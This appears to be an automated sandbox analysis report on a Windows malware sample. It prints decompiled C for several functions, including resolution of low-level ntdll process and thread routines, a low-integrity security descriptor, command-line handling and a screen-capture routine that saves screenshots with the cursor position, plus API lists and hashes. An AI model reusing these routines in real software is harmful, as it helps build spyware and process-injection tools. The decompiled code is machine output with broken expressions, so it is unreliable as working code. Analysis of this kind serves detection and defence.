Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Disassembly

Code Analysis


    Executed Functions

    C-Code - Quality: 87%
    			E0040635A(signed int** __ecx, void* __edx, signed char _a4) {
    				char _v922;
    				char _v1036;
    				char _v1428;
    				char _v1448;
    				intOrPtr _v1456;
    				intOrPtr _v1460;
    				signed int _v1464;
    				intOrPtr _v1468;
    				signed int** _v1472;
    				struct HINSTANCE__* _v1476;
    				void* __edi;
    				void* __esi;
    				signed int _t40;
    				struct HINSTANCE__* _t43;
    				struct HINSTANCE__* _t47;
    				_Unknown_base(*)()* _t53;
    				void* _t54;
    				signed int _t57;
    				void** _t58;
    				void** _t60;
    				signed int _t62;
    				signed int _t64;
    				signed int _t65;
    				signed int _t67;
    				void* _t73;
    				intOrPtr _t77;
    				signed int _t78;
    				signed int _t79;
    				signed int _t80;
    				struct HINSTANCE__* _t81;
    				int _t83;
    				signed int _t86;
    				void* _t89;
    				signed int* _t91;
    				signed int _t95;
    				WCHAR* _t97;
    				void* _t98;
    				signed int* _t100;
    				void* _t109;
    				void* _t110;
    				void* _t111;
    				void* _t112;
    
    				_t89 = __edx;
    				_t87 = __ecx;
    				_t95 = _a4 & 0x00000001;
    				_v1464 = _t95;
    				if(_t95 != 0) {
    					_t83 = 0;
    					__eflags = 0;
    				} else {
    					_t83 = 0;
    					 *0x422940 = 0;
    				}
    				_t91 = E00406015();
    				 *0x422958 = _t91;
    				if(_t91 == _t83) {
    					L27:
    					_t40 = 0;
    				} else {
    					if(_t95 != _t83) {
    						_v1464 = E00405F4F(_t87, _t89, _t91, "GetProcAddress");
    						_v1464 = E00405F4F(_t87, _t89, _t91, "LoadLibraryA");
    						_t43 =  *0x422954; // 0x400000
    						_t5 = _t43 + 0x3c; // 0xd8
    						_v1476 = _t43;
    						_t87 =  *_t5 + _t43 + 0x80;
    						__eflags = _v1464 - _t83;
    						if(_v1464 == _t83) {
    							goto L21;
    						} else {
    							__eflags = _v1460 - _t83;
    							if(_v1460 == _t83) {
    								goto L21;
    							} else {
    								_t91 =  *_t87;
    								__eflags = _t91 - _t83;
    								if(_t91 <= _t83) {
    									goto L21;
    								} else {
    									__eflags = _t87[1] - 0x14;
    									if(_t87[1] <= 0x14) {
    										goto L21;
    									} else {
    										_t91 = _t91 + _t43;
    										__eflags =  *_t91 - _t83;
    										if( *_t91 == _t83) {
    											goto L21;
    										} else {
    											while(1) {
    												_t77 = _v1456(_t91[3] + _v1468);
    												_v1456 = _t77;
    												__eflags = _t77 - _t83;
    												if(_t77 == _t83) {
    													goto L27;
    												}
    												_t100 = _v1472 +  *_t91;
    												_t86 = _v1472 + _t91[4];
    												while(1) {
    													_t78 =  *_t100;
    													__eflags = _t78;
    													if(__eflags == 0) {
    														break;
    													}
    													if(__eflags >= 0) {
    														_t87 = _v1472;
    														_t79 =  &(_v1472[0]) + _t78;
    													} else {
    														_t79 = _t78 & 0x0000ffff;
    													}
    													_t80 = _v1464(_v1456, _t79);
    													__eflags = _t80;
    													if(_t80 == 0) {
    														goto L27;
    													} else {
    														 *_t86 = _t80;
    														_t100 =  &(_t100[1]);
    														_t86 = _t86 + 4;
    														__eflags = _t86;
    														continue;
    													}
    													goto L47;
    												}
    												_t91 =  &(_t91[5]);
    												_t83 = 0;
    												__eflags =  *_t91;
    												if( *_t91 != 0) {
    													continue;
    												} else {
    													goto L21;
    												}
    												goto L47;
    											}
    											goto L27;
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t81 = GetModuleHandleW(_t83);
    						 *0x422954 = _t81;
    						if(_t81 == _t83) {
    							goto L27;
    						} else {
    							L21:
    							_t97 =  &_v1448;
    							E004159A4(0xe5, _t97);
    							_t47 = GetModuleHandleW(_t97);
    							 *0x42295c = _t47;
    							if(_t47 == _t83) {
    								goto L27;
    							} else {
    								_t98 = GetProcAddress;
    								 *0x422960 = GetProcAddress(_t47, "NtCreateThread");
    								 *0x422964 = GetProcAddress( *0x42295c, "NtCreateUserProcess");
    								 *0x422968 = GetProcAddress( *0x42295c, "NtQueryInformationProcess");
    								 *0x42296c = GetProcAddress( *0x42295c, "RtlUserThreadStart");
    								 *0x422970 = GetProcAddress( *0x42295c, "LdrLoadDll");
    								_t53 = GetProcAddress( *0x42295c, "LdrGetDllHandle");
    								 *0x422974 = _t53;
    								_t109 =  *0x422960 - _t83; // 0x77e599e0
    								if(_t109 != 0) {
    									L24:
    									_t111 =  *0x422968 - _t83; // 0x77e59670
    									if(_t111 == 0) {
    										goto L27;
    									} else {
    										_t112 =  *0x422970 - _t83; // 0x77e27840
    										if(_t112 == 0 || _t53 == _t83) {
    											goto L27;
    										} else {
    											_t54 = HeapCreate(_t83, 0x80000, _t83); // executed
    											 *0x423f34 = _t54;
    											__eflags = _t54 - _t83;
    											if(_t54 != _t83) {
    												 *0x422833 = 1;
    											} else {
    												 *0x423f34 = GetProcessHeap();
    												 *0x422833 = 0;
    											}
    											 *0x423568 = _t83;
    											 *0x422832 = 0;
    											InitializeCriticalSection(0x4230fc);
    											 *0x423114 = _t83; // executed
    											__imp__#115(0x202,  &_v1428); // executed
    											_t57 = E0040604F(_a4, _t87, _t91, _t98);
    											__eflags = _t57;
    											if(_t57 == 0) {
    												goto L27;
    											} else {
    												__eflags = _v1472 - _t83;
    												if(_v1472 != _t83) {
    													L34:
    													_t58 = E00417A38(_t87, 0xffffffff, 0x422950);
    													 *0x422944 = _t58;
    													__eflags = _t58 - _t83;
    													if(_t58 == _t83) {
    														goto L27;
    													} else {
    														 *0x422948 = GetLengthSid( *_t58);
    														_t60 =  *0x422944; // 0x0
    														 *0x42294c = E004177D0( *_t60, _t59);
    														_t62 = E004060CE(_t61, _a4);
    														__eflags = _t62;
    														if(_t62 == 0) {
    															goto L27;
    														} else {
    															 *0x422bb0 = GetCurrentProcessId();
    															 *0x422bb4 = _t83;
    															__eflags = _v1472 - _t83;
    															if(_v1472 != _t83) {
    																_t64 = 1;
    															} else {
    																_t64 = E00406130();
    															}
    															__eflags = _t64;
    															if(_t64 == 0) {
    																goto L27;
    															} else {
    																__eflags = _v1472 - _t83;
    																if(_v1472 == _t83) {
    																	E00406A39( &_v1036);
    																	_t87 = 0x422dae;
    																	E0041AA7A(0x422dae, 0x422bb8,  *0x42294c,  &_v922, _t83);
    																}
    																_t65 = E00406182(_a4);
    																__eflags = _t65;
    																if(_t65 == 0) {
    																	goto L27;
    																} else {
    																	__eflags = _a4 & 0x00000002;
    																	 *0x423f44 = _t83;
    																	 *0x4223a8 = 0;
    																	 *0x4227d0 = 0;
    																	 *0x423058 = 0;
    																	 *0x422ff0 = 0;
    																	 *0x423fc8 = 0;
    																	 *0x423f60 = 0;
    																	if(__eflags == 0) {
    																		_t67 = 1;
    																	} else {
    																		_t67 = E00406239(_t87, _t89, __eflags);
    																	}
    																	__eflags = _t67;
    																	_t38 = _t67 != 0;
    																	__eflags = _t38;
    																	_t40 = _t67 & 0xffffff00 | _t38;
    																}
    															}
    														}
    													}
    												} else {
    													_t73 = CreateEventW(0x422978, 1, _t83, _t83);
    													 *0x422e08 =  *0x422e08 | 0xffffffff;
    													 *0x422e04 = _t73;
    													__eflags = _t73 - _t83;
    													if(_t73 == _t83) {
    														goto L27;
    													} else {
    														goto L34;
    													}
    												}
    											}
    										}
    									}
    								} else {
    									_t110 =  *0x422964 - _t83; // 0x77e5a120
    									if(_t110 == 0) {
    										goto L27;
    									} else {
    										goto L24;
    									}
    								}
    							}
    						}
    					}
    				}
    				L47:
    				return _t40;
    			}
    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 0040639B
    • GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00406471
    • GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00406490
    • GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 004064A2
    • GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 004064B4
    • GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 004064C6
    • GetProcAddress.KERNEL32(LdrLoadDll), ref: 004064D8
    • GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 004064EA
    • HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 00406523
    • GetProcessHeap.KERNEL32(?,?,00000000), ref: 00406532
    • InitializeCriticalSection.KERNEL32(004230FC,?,?,00000000), ref: 0040655F
    • WSAStartup.WS2_32(00000202,?), ref: 00406575
    • CreateEventW.KERNEL32(00422978,00000001,00000000,00000000,?,?,00000000), ref: 00406596
    • GetLengthSid.ADVAPI32(00000000,000000FF,00422950,?,?,00000000), ref: 004065CB
    • GetCurrentProcessId.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 004065F8
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
    • String ID: @xw$GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
    • API String ID: 3091071419-944592941
    • Opcode ID: d13bfee092ff9dd684906568a8840a59710a497b4d0f9dcb8b10c10437af5aef
    • Instruction ID: 6061dff1ceb38a6b35a5de2894ae39c2373e96fa1b1f37307c6c51b30cc65102
    • Opcode Fuzzy Hash: d13bfee092ff9dd684906568a8840a59710a497b4d0f9dcb8b10c10437af5aef
    • Instruction Fuzzy Hash: 529194B1701341AFCB20EF60EE846167BA4BB44308F51043FE446B72A1D7788966CF5E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00419A10(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
    				signed int _v8;
    				struct _ACL* _v12;
    				int _v16;
    				int _v20;
    				void** _t19;
    				struct _SECURITY_DESCRIPTOR* _t28;
    				intOrPtr* _t29;
    
    				_t29 = __esi;
    				_t28 = __edi;
    				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
    					return 0;
    				} else {
    					_t19 =  &_v8;
    					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
    					if(_t19 == 0) {
    						L6:
    						_v8 = _v8 | 0xffffffff;
    						L7:
    						if(_t29 != 0) {
    							 *_t29 = 0xc;
    							 *(_t29 + 4) = _t28;
    							 *((intOrPtr*)(_t29 + 8)) = 0;
    						}
    						return _v8;
    					}
    					_v12 = 0;
    					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
    						LocalFree(_v8);
    						goto L6;
    					} else {
    						goto L7;
    					}
    				}
    			}
    APIs
    • InitializeSecurityDescriptor.ADVAPI32(00422984,00000001,00000000,00406583,?,?,00000000), ref: 00419A1A
    • SetSecurityDescriptorDacl.ADVAPI32(00422984,00000001,00000000,00000000,?,?,00000000), ref: 00419A2B
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00419A41
    • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 00419A5D
    • SetSecurityDescriptorSacl.ADVAPI32(00422984,?,?,?,?,?,00000000), ref: 00419A71
    • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 00419A7E
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
    • String ID: S:(ML;;NRNWNX;;;LW)
    • API String ID: 2050860296-820036962
    • Opcode ID: 97eb4743c3e229053cb5ca8b567ed8d45e8b51c9a39524f4e4168a2e678fcfe4
    • Instruction ID: 2c1b7b79a1242d3bd87dfcc850575d311915888ac4a3f362e099c32ffd8a9f28
    • Opcode Fuzzy Hash: 97eb4743c3e229053cb5ca8b567ed8d45e8b51c9a39524f4e4168a2e678fcfe4
    • Instruction Fuzzy Hash: 59114871A00249BFEB119FE48D85AEFBBBCBF00780F10446AF152F11A0D7758E849B29
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			E0041A9C4() {
    				void* _t30;
    				void* _t33;
    				intOrPtr* _t35;
    				void* _t36;
    				void* _t39;
    				void* _t41;
    
    				_t39 = _t41 - 0x74;
    				_t17 = _t39 - 0x260;
    				 *((char*)(_t39 + 0x73)) = 0;
    				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
    				if(_t17 != 0) {
    					L8:
    					E004164D4(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
    				} else {
    					PathAddBackslashW(_t39 - 0x260);
    					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
    					while(1) {
    						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
    						if(_t17 != 0) {
    							break;
    						}
    						PathRemoveBackslashW(_t39 - 0x260);
    						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
    							goto L8;
    						} else {
    							PathAddBackslashW(_t39 - 0x260);
    							continue;
    						}
    						goto L9;
    					}
    					if( *((short*)(_t39 - 0x44)) != 0x7b) {
    						goto L8;
    					} else {
    						 *((short*)(_t39 + 8)) = 0;
    						_t17 = _t39 - 0x44;
    						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
    						if(_t17 != 0) {
    							goto L8;
    						} else {
    							 *((char*)(_t39 + 0x73)) = 1;
    						}
    					}
    				}
    				L9:
    				return  *((intOrPtr*)(_t39 + 0x73));
    			}
    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,74B04EE0,00000000), ref: 0041A9E3
    • PathAddBackslashW.SHLWAPI(?), ref: 0041A9FA
    • PathRemoveBackslashW.SHLWAPI(?), ref: 0041AA0B
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 0041AA18
    • PathAddBackslashW.SHLWAPI(?), ref: 0041AA29
    • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 0041AA38
    • CLSIDFromString.OLE32(?,?), ref: 0041AA52
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
    • String ID:
    • API String ID: 613918483-0
    • Opcode ID: 289e17c043a25d8c47eb41dd3f9c7aedabca2c08cddb003256234e9f789300d9
    • Instruction ID: 101d448efc19f199e2cbf34b2f026e821729c82c8f4aca1c58aa0a73b138db12
    • Opcode Fuzzy Hash: 289e17c043a25d8c47eb41dd3f9c7aedabca2c08cddb003256234e9f789300d9
    • Instruction Fuzzy Hash: C411727190414CAADF20DBB0CD88EDB77ACAF08384F180466F515E3160E239DE98DF65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			_entry_(signed int __ecx, signed int __edx, void* __eflags, void* __fp0) {
    				char _v5;
    				int _v12;
    				char _v16;
    				char _v20;
    				void* _t22;
    				void* _t28;
    				char _t29;
    				char _t33;
    				void* _t50;
    
    				_t50 = __fp0;
    				_t35 = __edx;
    				_t34 = __ecx;
    				_t33 = 0; // executed
    				_t22 = E0040635A(__ecx, __edx, 0); // executed
    				if(_t22 == 0) {
    					L24:
    					__eflags = _t33;
    					_t21 = _t33 == 0;
    					__eflags = _t21;
    					ExitProcess(0 | _t21);
    				}
    				_v20 = 0;
    				_v16 = 1;
    				_v5 = 0;
    				SetErrorMode(0x8007);
    				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
    				if(_t28 == 0) {
    					L19:
    					_t29 = E00406F85(_t34, _t35, __eflags, _t50, _v20, _v16);
    					L20:
    					_t33 = _t29;
    					L21:
    					if(_t33 == 0 || ( *0x422940 & 0x00000002) == 0) {
    						goto L24;
    					} else {
    						Sleep(0xffffffff);
    						return _t29;
    					}
    				}
    				_t35 = 0;
    				if(_v12 <= 0) {
    					L14:
    					LocalFree(_t28);
    					_t47 = _t33;
    					if(_t33 == 0) {
    						__eflags = _v5;
    						if(__eflags == 0) {
    							goto L19;
    						}
    						E00408490(_t35);
    						_t29 = E0040945D();
    						__eflags =  *0x422940 & 0x00000004;
    						_t33 = _t29;
    						if(( *0x422940 & 0x00000004) != 0) {
    							_t29 = E00408309(0x422e10, 0);
    						}
    						goto L21;
    					}
    					_t29 = E00406D97(_t47);
    					goto L20;
    				} else {
    					goto L3;
    				}
    				do {
    					L3:
    					_t34 =  *(_t28 + _t35 * 4);
    					if(_t34 != 0 &&  *_t34 == 0x2d) {
    						_t34 =  *(_t34 + 2) & 0x0000ffff;
    						if(_t34 == 0x66) {
    							_v20 = 1;
    						} else {
    							if(_t34 == 0x69) {
    								_t33 = 1;
    							} else {
    								if(_t34 == 0x6e) {
    									_v16 = 0;
    								} else {
    									if(_t34 == 0x76) {
    										_v5 = 1;
    									}
    								}
    							}
    						}
    					}
    					_t35 = _t35 + 1;
    				} while (_t35 < _v12);
    				goto L14;
    			}
    APIs
      • Part of subcall function 0040635A: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 0040639B
      • Part of subcall function 0040635A: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00406471
      • Part of subcall function 0040635A: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00406490
      • Part of subcall function 0040635A: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 004064A2
      • Part of subcall function 0040635A: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 004064B4
      • Part of subcall function 0040635A: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 004064C6
      • Part of subcall function 0040635A: GetProcAddress.KERNEL32(LdrLoadDll), ref: 004064D8
      • Part of subcall function 0040635A: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 004064EA
    • SetErrorMode.KERNEL32(00008007,00000000), ref: 004072B2
    • GetCommandLineW.KERNEL32(?), ref: 004072BC
    • CommandLineToArgvW.SHELL32(00000000), ref: 004072C3
    • LocalFree.KERNEL32(00000000), ref: 00407318
    • Sleep.KERNEL32(000000FF,?,00000001), ref: 0040736E
    • ExitProcess.KERNEL32 ref: 0040737F
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
    • String ID:
    • API String ID: 1184560534-0
    • Opcode ID: d6b0bcc6428c41cce2b6a2ea47eb37e0ec7c7f0befa63b34e4b03ffa33df2e78
    • Instruction ID: f507415d81f08f02b32219bc7ce47ddd3f9e13d2743c74e6488ce8134c9030b9
    • Opcode Fuzzy Hash: d6b0bcc6428c41cce2b6a2ea47eb37e0ec7c7f0befa63b34e4b03ffa33df2e78
    • Instruction Fuzzy Hash: E221D520E4C24596EB2567B589187AE3B546F02308F0844BFED41B72E2D77D6845E71B
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 38%
    			E0040F20F(WCHAR* _a4, char _a8, signed short _a12) {
    				struct HINSTANCE__* _v12;
    				struct HINSTANCE__* _v16;
    				struct HINSTANCE__* _v20;
    				_Unknown_base(*)()* _v24;
    				void* _v28;
    				void* _v32;
    				struct HDC__* _v36;
    				_Unknown_base(*)()* _v40;
    				_Unknown_base(*)()* _v44;
    				struct tagPOINT _v52;
    				_Unknown_base(*)()* _v56;
    				struct HINSTANCE__* _v60;
    				_Unknown_base(*)()* _v64;
    				_Unknown_base(*)()* _v68;
    				_Unknown_base(*)()* _v72;
    				_Unknown_base(*)()* _v76;
    				_Unknown_base(*)()* _v80;
    				_Unknown_base(*)()* _v84;
    				_Unknown_base(*)()* _v88;
    				struct HINSTANCE__* _v92;
    				struct HINSTANCE__* _v96;
    				struct HINSTANCE__* _v100;
    				char _v104;
    				_Unknown_base(*)()* _v108;
    				intOrPtr _v112;
    				char _v116;
    				_Unknown_base(*)()* _v120;
    				char _v148;
    				signed int _v152;
    				struct _ICONINFO _v172;
    				char _v188;
    				struct HINSTANCE__* _t169;
    				_Unknown_base(*)()* _t176;
    				struct HINSTANCE__* _t181;
    				_Unknown_base(*)()* _t182;
    				struct HINSTANCE__* _t183;
    				_Unknown_base(*)()* _t191;
    				struct HDC__* _t197;
    				struct HICON__* _t199;
    				signed int _t200;
    				intOrPtr _t202;
    				intOrPtr _t204;
    				void* _t206;
    				void* _t223;
    				intOrPtr* _t224;
    				void* _t239;
    				void* _t248;
    				unsigned int _t260;
    				intOrPtr* _t262;
    				signed short _t263;
    				intOrPtr _t264;
    				WCHAR** _t265;
    				intOrPtr _t268;
    				signed int _t269;
    				signed int _t272;
    				void* _t275;
    
    				_v32 = 0;
    				_v60 = 0;
    				_v16 = 0;
    				_v104 = 1;
    				_v100 = 0;
    				_v96 = 0;
    				_v92 = 0;
    				_t169 = LoadLibraryA("gdiplus.dll");
    				_v20 = _t169;
    				_v24 = GetProcAddress(_t169, "GdiplusStartup");
    				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
    				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
    				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
    				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
    				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
    				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
    				_v108 = _t176;
    				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
    					L66:
    					if(_v20 != 0) {
    						FreeLibrary(_v20);
    					}
    					if(_v60 != 0) {
    						FreeLibrary(_v60);
    					}
    					if(_v16 != 0) {
    						FreeLibrary(_v16);
    					}
    					return _v32;
    				} else {
    					_t181 = LoadLibraryA("ole32.dll");
    					_v60 = _t181;
    					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
    					_v120 = _t182;
    					if(_t182 == 0) {
    						goto L66;
    					}
    					_t183 = LoadLibraryA("gdi32.dll");
    					_v16 = _t183;
    					_t262 = GetProcAddress(_t183, "CreateDCW");
    					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
    					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
    					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
    					_v56 = GetProcAddress(_v16, "SelectObject");
    					_v76 = GetProcAddress(_v16, "BitBlt");
    					_v84 = GetProcAddress(_v16, "DeleteObject");
    					_t191 = GetProcAddress(_v16, "DeleteDC");
    					_v68 = _t191;
    					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
    						goto L66;
    					} else {
    						_push(0);
    						_push( &_v104);
    						_push( &_v116);
    						_v104 = 1;
    						_v100 = 0;
    						_v96 = 0;
    						_v92 = 0;
    						if(_v24() != 0) {
    							goto L66;
    						}
    						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
    						_v24 = _t268;
    						if(_t268 == 0) {
    							L65:
    							_v80(_v116);
    							goto L66;
    						}
    						_t197 = _v12(_t268);
    						_v36 = _t197;
    						if(_t197 == 0) {
    							L64:
    							_v68(_v24);
    							goto L65;
    						}
    						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
    						_v12 = _t199;
    						if(_t199 == 0) {
    							L24:
    							_t263 = 0;
    							goto L26;
    						} else {
    							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
    								_v12 = 0;
    							}
    							if(_v12 != 0) {
    								_t263 = _a12;
    								L26:
    								if(_t263 == 0) {
    									_t200 = _v28(_t268, 8);
    									_t269 = _t200;
    									_a12 = _v28(_v24, 0xa);
    								} else {
    									_t269 = _t263 & 0x0000ffff;
    									_a12 = _t269;
    								}
    								_t202 = _v44(_v24, _t269, _a12);
    								_v44 = _t202;
    								if(_t202 == 0) {
    									L63:
    									_v68(_v36);
    									goto L64;
    								} else {
    									_t204 = _v56(_v36, _t202);
    									_v112 = _t204;
    									if(_t204 == 0) {
    										L62:
    										_v84(_v44);
    										goto L63;
    									}
    									_t206 = 0;
    									_t248 = 0;
    									if(_t263 != 0) {
    										_t260 = (_t263 & 0x0000ffff) >> 1;
    										_t206 =  <  ? 0 : _v52.x - _t260;
    										_t248 =  <  ? 0 : _v52.y - _t260;
    										_t81 =  &_v52;
    										 *_t81 = _v52.x - _t206;
    										if( *_t81 < 0) {
    											_v52.x = 0;
    										}
    										_t84 =  &(_v52.y);
    										 *_t84 = _v52.y - _t248;
    										if( *_t84 < 0) {
    											_v52.y = 0;
    										}
    									}
    									_push(0x40cc0020);
    									_push(_t248);
    									_push(_t206);
    									_push(_v24);
    									_push(_a12);
    									_push(_t269);
    									_push(0);
    									_push(0);
    									_push(_v36);
    									if(_v76() == 0) {
    										L61:
    										_v56(_v36, _v112);
    										goto L62;
    									} else {
    										if(_v12 != 0) {
    											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
    											_t239 = _v52.y - _v172.yHotspot;
    											_t240 =  <  ? 0 : _t239;
    											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
    										}
    										_push( &_v12);
    										_push(0);
    										_push(_v44);
    										_v12 = 0;
    										if(_v88() != 0 || _v12 == 0) {
    											goto L61;
    										} else {
    											_push( &_v28);
    											_push( &_a12);
    											_a12 = 0;
    											_v28 = 0;
    											if(_v40() != 0) {
    												L60:
    												_v72(_v12);
    												goto L61;
    											}
    											_t215 = _v28;
    											if(_v28 == 0 || _a12 == 0) {
    												goto L60;
    											} else {
    												_t264 = E004163F1(_t215);
    												_v40 = _t264;
    												if(_t264 == 0) {
    													goto L60;
    												}
    												_push(_t264);
    												_push(_v28);
    												_push(_a12);
    												if(_v64() != 0) {
    													L52:
    													E00416421(_v40);
    													if(_a12 == 0) {
    														_push( &_v32);
    														_push(1);
    														_push(0);
    														if(_v120() == 0 && _v32 != 0) {
    															_v152 = 0;
    															if(_a8 > 0) {
    																E0041645D( &_v148, 0x403540, 0x10);
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
    																_v152 = _v152 + 1;
    															}
    															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
    															_t224 = _v32;
    															if(_t223 == 0) {
    																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
    															} else {
    																 *((intOrPtr*)( *_t224 + 8))(_t224);
    																_v32 = 0;
    															}
    														}
    													}
    													goto L60;
    												}
    												_t272 = 0;
    												if(_a12 <= 0) {
    													goto L52;
    												}
    												_t265 = _t264 + 0x30;
    												while(lstrcmpiW(_a4,  *_t265) != 0) {
    													_t272 = _t272 + 1;
    													_t265 =  &(_t265[0x13]);
    													if(_t272 < _a12) {
    														continue;
    													}
    													goto L52;
    												}
    												E0041645D( &_v188, _t272 * 0x4c + _v40, 0x10);
    												_a12 = 0;
    												goto L52;
    											}
    										}
    									}
    								}
    							}
    							goto L24;
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0040F241
    • GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040F252
    • GetProcAddress.KERNEL32(?,GdiplusShutdown), ref: 0040F25F
    • GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 0040F26C
    • GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 0040F279
    • GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 0040F286
    • GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 0040F293
    • GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 0040F2A0
    • LoadLibraryA.KERNEL32(ole32.dll), ref: 0040F2E8
    • GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040F2F3
    • LoadLibraryA.KERNEL32(gdi32.dll), ref: 0040F305
    • GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040F310
    • GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040F31C
    • GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040F329
